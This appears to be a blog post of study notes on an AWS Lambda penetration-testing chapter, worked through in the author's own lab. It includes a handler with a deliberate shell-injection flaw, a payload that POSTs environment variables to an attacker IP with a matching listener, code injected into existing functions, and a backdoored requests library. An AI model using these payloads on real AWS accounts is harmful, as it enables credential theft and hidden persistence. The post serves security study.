Book info – Hands-On AWS Penetration Testing with Kali Linux
Disclaimer: Working through this book will use AWS, which costs money. Make sure you are doing things to manage your costs. If I remember, I’ll keep up with my costs to help get a general idea. But prices can change at any time, so major grain of salt.
Disclaimer #2: Jail is bad. Cybercrime is illegal. Educational purposes. IANAL. Don’t do things you shouldn’t. Etc.
I decided to add this as I finish each chapter in this section (chapters 12-14) because it’s a lot of content, so if the chapter you are looking for isn’t here yet it will be soon. Of course “soon” is a relative term, so if 13 and 14 are as long and dense as 12, it’ll be awhile.
Ch 12 – Security and Pentesting of AWS Lambda
I haven’t used AWS Lambda services, so really looking forward to this chapter – probably going to end up digging through the documentation to get a better handle on what it offers.
When a chapter starts by saying a service is amazing, that sounds to me like there will also be some pretty substantial opportunities for exploitation. AWS Lambda allows for serverless applications and functions. Pricing is pretty typical for AWS (pay for what you use; a function can run for a max of 15 min.). The authors also point out that servers are actually involved – you just don’t get to mess with them since one is spun up in isolation to run the function. So you can do quite a bit, but the filesystem is read-only except for the
/tmp directory and you basically have no chance of getting root. And per the authors, if you do manage to get root, AWS would probably like to know about it.
Sounds great in theory, but I was kind of having a “so what” moment with it. The book gave the example of using a Lambda function to do a virus scan on files uploaded to an S3 bucket. That makes sense. And there look to be some automation options available (run off a trigger, take an action depending on outcome, etc.). I’m a fan of automating the things that should be automated, so yay.
Setting up a vulnerable Lambda function
The demo function will inspect the contents of files uploaded to an S3 bucket and tag the file accordingly. We’ll intentionally make some coding errors to make it exploitable, so the authors remind you not to put it in production. I will continue doing as I have and only have the exploitable feature available when I’m working on it. It results in a lot of doing/undoing, but I’ve found that helps me internalize the content. Plus, leaving something I know is exploitable exposed just makes me twitchy.
Start by creating an S3 bucket (or you can probably use one of the ones you created in earlier chapters). Everything was left as default, so straightforward creation.
Then pop up the IAM dashboard and create a role to use. It will use the AWS service trusted entity option and the Lambda option. For permissions, give it
AWSLambdaBasicExecutionRole (allows the function to push execution logs to CloudWatch; the minimum set of permissions for Lambda functions) and
AmazonS3FullAccess (allows way too much interaction with all the S3 things in your account – don’t use this in production, but common and so helpful for demo purposes). Name it something, describe it if desired, and create it.
Now on to the function – go to the Lambda dashboard (it’s under the Compute section in the Services menu) and go through “Create function” > “Author from scratch” > Give it a name > Select Python 3.7 as Runtime > Select “Use an existing role” and the role you just created > “Create function”. Look around the dashboard if you want before heading back to the S3 bucket to create the event trigger.
In the S3 bucket, go to the Properties tab and click on “Events” under “Advanced settings”. Then it’s “Add notification” > Name it > Check the “All object create events” box > Send to Lambda Function > Lambda pick the function just created > Save. Make sure your Events box shows an Active notification now. The trigger should also be there when you refresh the page for your function.
Now add the vulnerable code. This one wasn’t posted to the GitHub for the book for some reason. Just watch your spacing as you put it in. I typed it up in Notepad++ so I could copy/paste in to AWS when I’m working on the exploit.
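Since the book’s code isn’t on its GitHub, here’s a rough sketch of the pattern – this is my reconstruction, not the book’s exact listing, and the zipinfo/tagging details are assumptions: download the uploaded object, check it with a shell command, and tag it based on the result. The shell=True call on a string containing the user-controlled key is the intentional vulnerability.

```python
# Hypothetical reconstruction of the vulnerable handler - NOT the book's exact code.
# The bug: the attacker-controlled S3 key ends up in a shell command string.
import subprocess
import urllib.parse


def build_command(download_path):
    # Vulnerable: a key like "x;curl evil" injects commands under shell=True
    return 'zipinfo {}'.format(download_path)


def lambda_handler(event, context):
    import boto3  # available in the Lambda runtime
    s3 = boto3.client('s3')
    for record in event['Records']:
        bucket = record['s3']['bucket']['name']
        # S3 delivers the key URL-encoded - hence the urllib.parse import
        key = urllib.parse.unquote_plus(record['s3']['object']['key'])
        path = '/tmp/{}'.format(key)  # /tmp is the only writable path
        s3.download_file(bucket, key, path)
        try:
            subprocess.check_output(build_command(path), shell=True)
            tag = 'archive'
        except subprocess.CalledProcessError:
            tag = 'other'  # zipinfo failed, so not a zip
        s3.put_object_tagging(
            Bucket=bucket, Key=key,
            Tagging={'TagSet': [{'Key': 'Type', 'Value': tag}]},
        )
```

The injectable piece is build_command – any shell metacharacters in the uploaded file name pass straight through.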
Attacking Lambda functions with read access
First up – create or adjust a user to use for attacking that you are pretending you have already compromised. It will be set up for read-only Lambda and object-upload S3 access. So create a custom inline IAM policy with the read-only Lambda actions plus
s3:PutObject, and attach it to your desired user. The authors say this is a typical example of permissions.
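As a sketch, the inline policy for the “compromised” user might look something like this (my own approximation, not the book’s exact policy – tighten the Resource values to taste):

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Effect": "Allow",
      "Action": [
        "lambda:List*",
        "lambda:Get*",
        "s3:PutObject"
      ],
      "Resource": "*"
    }
  ]
}
```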
First step in pentesting AWS Lambda is checking the data for all the Lambda functions.
aws lambda list-functions --profile <lambdaprofile> --region <region>
This pulls lots of info about the functions, including the environment variables. The “app_secret” we added is a demo option, but the authors point out you can find all kinds of interesting things in the environment variables portion. If the “Environment” piece isn’t in your output, it’s because there aren’t any.
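If you’d rather script the recon than eyeball JSON, a quick helper along these lines (my own sketch, operating on the list-functions response shape) pulls any environment variables out of the output:

```python
# Sketch: harvest environment variables out of a list-functions response.
# Feed it boto3's client('lambda').list_functions() output when live.


def harvest_env_vars(response):
    """Return {function_name: {var: value}} for functions with env vars."""
    found = {}
    for fn in response.get('Functions', []):
        env = fn.get('Environment', {}).get('Variables', {})
        if env:  # the "Environment" key is absent when there are none
            found[fn['FunctionName']] = env
    return found


# Made-up sample trimmed to the fields we care about
sample = {
    'Functions': [
        {'FunctionName': 'VulnFunction',
         'Environment': {'Variables': {'app_secret': '1234567890'}}},
        {'FunctionName': 'BoringFunction'},  # no Environment key at all
    ]
}
```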
Next up is checking the code. You can use the list and run each one through
GetFunction to pull the code.
aws lambda get-function --function-name <name> --profile <lambdaprofile> --region <region>
This will return a “Code” piece that will have the info needed to download the code – pull the URL and paste into a browser. It’s a VERY long URL. It will prompt you to download a Zip folder containing the code. Extracting will give us a single file – in practice, this folder may contain multiple files. Next up is static analysis of the code. The coding language was provided in the “Runtime” variable when the
get-function command was run, so you know what language you need to analyze. This analysis is done using Bandit, which is available through
pip. The GitHub install directions were a little different from the book. I used the GitHub directions with the thought they would be the current version:
python3 -m venv bandit-env
source bandit-env/bin/activate
pip3 install bandit
The virtual environment is to prevent issues with dependencies. The current Bandit version (June 2020) is 1.6.2 compared to 1.5.1 in the book. I got a syntax error while parsing AST – basically, my spacing was off. So I had to fix that. I forget how Python does spacing. Every. Dang. Time. Fix, run again. And get the same findings as the book. Bandit is a static analysis tool, so review for false positives. The first issue was related to the subprocess module, which could be an issue. The second is dealing with the
/tmp/ directory. Could be a problem, but in the context of Lambda it’s not. The third was an issue with the subprocess calling a shell. That would be a problem – it allows injection of shell commands. The book goes into more details about the exploitation info and how to go about it, so be sure to read those parts carefully.
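To see why Bandit flags that third finding, compare the two subprocess styles in a quick local demo (using echo on a POSIX shell, not the book’s code) – with shell=True an attacker-controlled filename executes; passed as a list, it stays a literal argument:

```python
# Local demo of Bandit's shell-injection finding. The "filename" carries a
# payload after the semicolon; only the shell=True form executes it.
import subprocess

malicious_name = 'file.zip; echo INJECTED'

# Unsafe: the whole string goes to /bin/sh, so ; starts a second command
unsafe = subprocess.check_output(
    'echo {}'.format(malicious_name), shell=True).decode()

# Safer: args are passed directly to the program; the ; is just text
safe = subprocess.check_output(['echo', malicious_name]).decode()
```

The unsafe version prints two lines because the injected echo ran; the safe version prints the name verbatim.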
Then comes pulling down the event source mappings. There are none for our demo function, but these provide info about how functions hook into another service.
Next up is looking at the resource policy that shows what can run the function. Pull it down with:
aws lambda get-policy --function-name <name> --profile <lambdaprofile> --region <region>
If you get no response, it indicates there’s no resource policy. Which means you’re unlikely to be able to run the function unless you happen to have the
lambda:InvokeFunction permission. The one returned in the case of our demo function will show that the function is invoked when an object is uploaded to the S3 bucket.
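For reference, the policy that comes back (inside the stringified “Policy” field) looks roughly like this for an S3-triggered function – the IDs and ARNs below are placeholders:

```json
{
  "Version": "2012-10-17",
  "Statement": [
    {
      "Sid": "<statement-id>",
      "Effect": "Allow",
      "Principal": {"Service": "s3.amazonaws.com"},
      "Action": "lambda:InvokeFunction",
      "Resource": "arn:aws:lambda:<region>:<account-id>:function:<name>",
      "Condition": {
        "ArnLike": {"AWS:SourceArn": "arn:aws:s3:::<bucket-name>"}
      }
    }
  ]
}
```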
Putting the pieces together, this means you can upload a file with shell code in the name that will eventually get executed. This can lead to more creds, which can lead to more exploitation. Building the payload for exploitation can be easier if you pull the Lambda function over for testing. This will keep your testing from alerting anyone watching on the AWS account you are targeting. Lambda functions run on an OS with
curl installed. Lots of details about what exactly you are doing and how to do it lead to including an HTTP call in a file name that gets parsed and sends creds to a listener set up on your Kali instance. Except it kept identifying the file as not a zip file, so no creds. There is a delay of a couple minutes or so between uploading and the function executing, so be patient. And check the monitoring on the function if you aren’t getting the expected results, because the logs will hopefully help you track down the issue.
Make sure that when you enter the function code, you include
import urllib.parse – otherwise the parse portion is not pulled in and you get nowhere because your file won’t be identified as a zip. Or at least that was what I found to happen. From the GeeksforGeeks summary, it looks like
urllib comes as part of Python’s standard library, but to use its modules you have to import the specific submodule.
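A quick local illustration of why that import matters: S3 delivers the object key URL-encoded, so without urllib.parse.unquote_plus the function works on the encoded name and nothing matches (the key below is made up):

```python
# S3 event keys arrive URL-encoded; decode before touching the filesystem.
import urllib.parse

# Made-up key as it would appear in the S3 event record
raw_key = 'evil%3Bcurl+http%3A//198.51.100.5/.zip'
decoded = urllib.parse.unquote_plus(raw_key)
```

unquote_plus turns %3B back into a semicolon and the + back into a space, which is exactly what lets the injected command survive to the shell.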
The other likely issue is making sure you enter the Lambda function code correctly and create the file with the correct file name.
NOTE: Make sure you update the IP in your upload if you shutdown and restart your Kali instance. While it’s unlikely you’ll send creds to someone you shouldn’t accidentally, it’s probably best to avoid it altogether.
Once you’ve got it to connect, you have the creds for the role attached to the function. What I find interesting is that the creds pulled are nowhere that I can find in IAM. Which makes me wonder about auditing on when functions are called and by whom. My CloudWatch logs had the when part, but not the who part. I would imagine there are ways to log this, and I just didn’t set them up when I did the quick CloudWatch and CloudTrail setup in the last chapter. I decided to take 2 seconds and google it. CloudTrail seems to have the activity of interest. I didn’t find exactly what I was looking for, but I do think the info is there and logging can be configured to audit and alert on this type of exploit. If I’m understanding how roles are granted access correctly, the creds you pull will have a time limit on them since roles have a maximum CLI/API session duration. The authors point out that when the book was written, GuardDuty did not apply to cred exfiltration from Lambda servers, so alerting may be easier said than done.
Using custom test events is recommended for testing how to get input into the function. Other tips for pentesting Lambda functions: check the tags, pull the function over for testing (likely using the option to download a zip of the entire function), check the CloudWatch logs, formulate payloads that avoid breaking execution of the function (because of the noise), and watch the timeout of the function to maximize ROI.
Sidenote: Something to keep in mind, depending on which version of netcat you have, you may not be able to use certain flags together. The version I have on Kali and my WSL will let you use the
-l and -p flags together, but others don’t. Check the man page where you are working to see what flags cannot be used together.
Attacking Lambda functions with read and write access
For this section, we’re operating with
lambda:* permissions – basically do all the things with Lambda functions. This opens a lot of options for attack. This section is working with the function we just made, so if you didn’t get it working, you might want to go back and do that.
Apparently privilege escalation is relatively easy – that makes me feel good. The first demo for this section will need a user with
iam:ListRoles permissions. Start by pulling down the roles and seeing what roles Lambda can get.
aws iam list-roles --profile <lambdaRWprofile>
See what’s there…maybe even the Admin role you created earlier that you want to delete. Who knows. My list, however, did not include the book’s
LambdaEC2FullAccess role. Since we have the option of passing a role, the plan is to exploit it by creating a Lambda function to do what we want. You can create functions using the API, but the demo is with the console. Creds don’t need to be specified because the function will automatically check the environment variables. By using a test event, you can view the execution results even without having the ability to view CloudWatch logs. Running the demo function, I was able to view the information on associated EC2 instances, so everything worked as expected. This can be further exploited as desired using EC2 permissions.
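The privilege-escalation function can stay tiny. Here’s a sketch of the idea (my version, not the book’s listing) with the response parsing split into a helper so the execution results are easy to eyeball:

```python
# Sketch of a privesc Lambda: runs under a passed role with EC2 read access.
# No creds appear in the code - the execution role supplies them.


def summarize_reservations(response):
    """Boil a describe_instances response down to id/state/IP per instance."""
    out = []
    for reservation in response.get('Reservations', []):
        for inst in reservation.get('Instances', []):
            out.append({
                'id': inst.get('InstanceId'),
                'state': inst.get('State', {}).get('Name'),
                'private_ip': inst.get('PrivateIpAddress'),
            })
    return out


def lambda_handler(event, context):
    import boto3  # available in the Lambda runtime
    ec2 = boto3.client('ec2')
    # The returned value shows up in the execution results of a test event
    return summarize_reservations(ec2.describe_instances())
```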
The next demo is without the
PassRole permission, so no new functions. So back to modifying an existing one. Just be careful, because breaking one would be a pretty big oopsie. So you want the additional code to not disrupt the function, and to place it toward the top to increase the likelihood it will be executed. Using
try/except is a good option to prevent throwing errors where they’ll be seen.
This part of the demo just listed S3 buckets:
# Add to existing function with appropriate indentation
try:
    s3 = boto3.client('s3')
    print(s3.list_buckets())
except:
    pass
With this scenario, we are presuming we can view the execution logs which requires either CloudWatch access or running test events. And if you run it against a test event (if you are in the console with those permissions), you can check the execution results to see the outcome. You also don’t know the full context of the function, so it would be easy to make an adjustment that would make it deviate from the expected behavior. You can ignore this and hope for the best or modify the payload to exfil creds. Exfiltrating creds is likely the “safer” option. You can do this in a somewhat roundabout way (if you don’t use the option done earlier) via the
requests library. This library can be pulled from the
botocore library which is required for Lambda functions:
from botocore.vendored import requests
You can use this to pull environment variables or run API calls from the function to exfil output. The latter is apparently safer because it would come from the expected IP, but the environment variables option will be more versatile and require less overall modification. So I guess it would come down to which you are more comfortable with, the maturity level of the entity you are pentesting, and the desired outcome. You can use the requests library to send an HTTP POST with the variables with a low timeout to avoid bonking things. Then you wait for it to trigger, which in our lab scenario may happen with either a test event or uploading a file to the S3 bucket. The test event works fine, but testing with an S3 upload is not a bad idea. And make sure you save the Lambda function after you make any changes so it does what you are trying to do.
The key piece is
requests.post('http://<ip>', json=os.environ.copy(), timeout=0.01). That will push the environmental variables to your listener.
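On the receiving end, anything that logs the POST body works. Here’s a minimal Python listener as a sketch (the book side uses netcat; this just parses the JSON body for you):

```python
# Minimal listener for the exfiltrated environment variables.
# A Python stand-in for the netcat listener that also parses the JSON body.
import json
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer

captured = []  # env-var dicts received from the function


class ExfilHandler(BaseHTTPRequestHandler):
    def do_POST(self):
        length = int(self.headers.get('Content-Length', 0))
        captured.append(json.loads(self.rfile.read(length)))
        self.send_response(200)
        self.end_headers()

    def log_message(self, *args):
        pass  # keep the console quiet


def start_listener(port=0):
    """Bind on localhost, serve in the background; return (server, port)."""
    server = HTTPServer(('127.0.0.1', port), ExfilHandler)
    threading.Thread(target=server.serve_forever, daemon=True).start()
    return server, server.server_address[1]
```

Bind to 0.0.0.0 (and open the port) instead of 127.0.0.1 if the function needs to reach you across the internet, and remember the note about keeping the IP in the payload current.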
This will be similar to priv esc. Lots of options to do this, including modifying an existing function and pulling the data it receives, creating a new function to trigger on key events, or modifying an existing function with a payload somewhere discreet. The authors insinuate this is just scratching the surface, so diving more into AWS would help. By changing os.environ.copy() to
event in the payload, you can exfiltrate the value of the event parameter instead. I would demo this one with an S3 upload so you can better see the information available. It will work with the Hello World test event, but it’s more valuable to see what a realistic event looks like.
Working with this, I got a pretty important notice in my logs.
/var/runtime/botocore/vendored/requests/api.py:72: DeprecationWarning: You are using the post() function from 'botocore.vendored.requests'. This dependency was removed from Botocore and will be removed from Lambda after 2021/01/30. https://aws.amazon.com/blogs/developer/removing-the-vendored-version-of-requests-from-botocore/. Install the requests package, 'import requests' directly, and use the requests.post() function instead. DeprecationWarning
So it looks like this specific method of exploiting requests will not be an option for much longer.
The authors also pointed out several times you have to watch the timeout amount. You can make the function timeout if you try to pull too much. You can increase the time if you have access, but that can cause billing anomalies that could get you caught.
This won’t be a deep dive because you can use the methods covered earlier. And what persistence means can vary. Think about context and what will work. Consider backdooring multiple Lambda functions for a backup if one gets removed.
Yep, that was a short section. And I’m not even mad.
This section was neat. Basically, a random function in the code calling out to a random IP is likely going to get noticed if anyone familiar with the code reviews the function. You think? Especially since putting the exploit early is desired so you know it will get triggered. So this section talked about backdooring the dependencies. Super cool. (I’m not a developer/programmer/coder, so I thought this was really cool to get to try. I dabble and script, but not at the depth of many I know.)
If you can’t pull requests from botocore, which you won’t be able to in a few months anyway, you have to include the library along with the code. And that library can be backdoored. Unfortunately, when I pulled the function code down, it did not include the requests library. I think for the library to come down with the function code, it would have to have been uploaded as part of the deployment package in the first place. Amazon provides install directions for how to upload dependencies.
# Pull down requests to directory for function
sudo pip3 install requests --target ./<dir>

# The def get portion to edit is in the /requests/api.py file
cd ./<dir>
zip -r9 ./function.zip .

# Add lambda function code
zip -g ./function.zip ./lambda_function.py

# Upload modified code, make sure to use a profile with Lambda write privileges
# The fileb:// portion is required but not part of the file path
aws lambda update-function-code --function-name <functionName> --zip-file fileb://function.zip --profile <profile>
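For the backdoor itself, the idea is to leave the library’s behavior intact and just add a quiet side effect. Sketched in plain Python below as a stand-in for the edit to requests/api.py – the function names and exfil mechanism here are illustrative, not the book’s exact diff:

```python
# Sketch of backdooring a dependency: wrap the real function, keep its
# behavior, and add a quiet side effect. Stand-in code, not requests itself.


def original_get(url, **kwargs):
    # Placeholder standing in for requests.api.get's real HTTP work
    return 'response from {}'.format(url)


exfil_log = []  # stand-in for the attacker's HTTP POST


def backdoored_get(url, **kwargs):
    try:
        # Side effect: record (or POST out) what the caller requested
        exfil_log.append(url)
    except Exception:
        pass  # never break the function the victim depends on
    return original_get(url, **kwargs)  # unchanged result for the caller
```

The try/except around the side effect mirrors the earlier advice: the payload should never throw an error where it would be seen.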
This got the requests library and dependencies into the function, but my function kept timing out and no connections in Kali. I tested the function in Python to make sure it was working, so it may have been something with how I added the requests library or messing with the function name.
Starting with a “fresh” function, I entered the Python code to import requests and pull a URL. That errored out with the message that the requests library couldn’t be found. Pulled that function down, changed to the parent of that folder, installed requests in the function’s folder, zipped, added the Lambda function code, and uploaded. So far, so good. And it failed with a task timed out message again. Bumped the timeout up to 5 seconds, and it went through. Pulled it down, made the edits to the
api.py file in the requests library, went through the steps to update the dependencies again, uploaded, and success!
Pivoting into Virtual Private Clouds
Since Lambda functions can be launched into a VPC, you can use them to pivot into an internal network. Depending on access, you could take a Lambda function that launches into a VPC and modify it, or create a new one that launches into a VPC. The default for Lambda functions is to run in a default VPC managed by the system. The functions we’ve set up so far have used this option. When launching a function into a VPC, you have to make sure internet access is configured (the book and the Edit VPC page in the console point this out), so make sure the VPC being used is set up for internet access (has a NAT gateway). This looks like a great way to gain a foothold in an organization’s cloud infrastructure. You have to look at the security group rules to determine how to exploit, but it looks interesting. I may try doing this in the VPC I have for my Windows and Ubuntu EC2 instances, but not right now.
My takeaway: Lambda functions have a high likelihood for shenanigans, so make sure you check them out. And if you are setting them up, be diligent in following best practices and properly locking them down.
That was a loooooooooooooooooong chapter. Ton of content, very dense. Lots of great information, but I feel like I’ve just scratched the surface of what Lambda functions can do.
Lots of frustration getting the initial vulnerable function working, so I added it to my GitHub.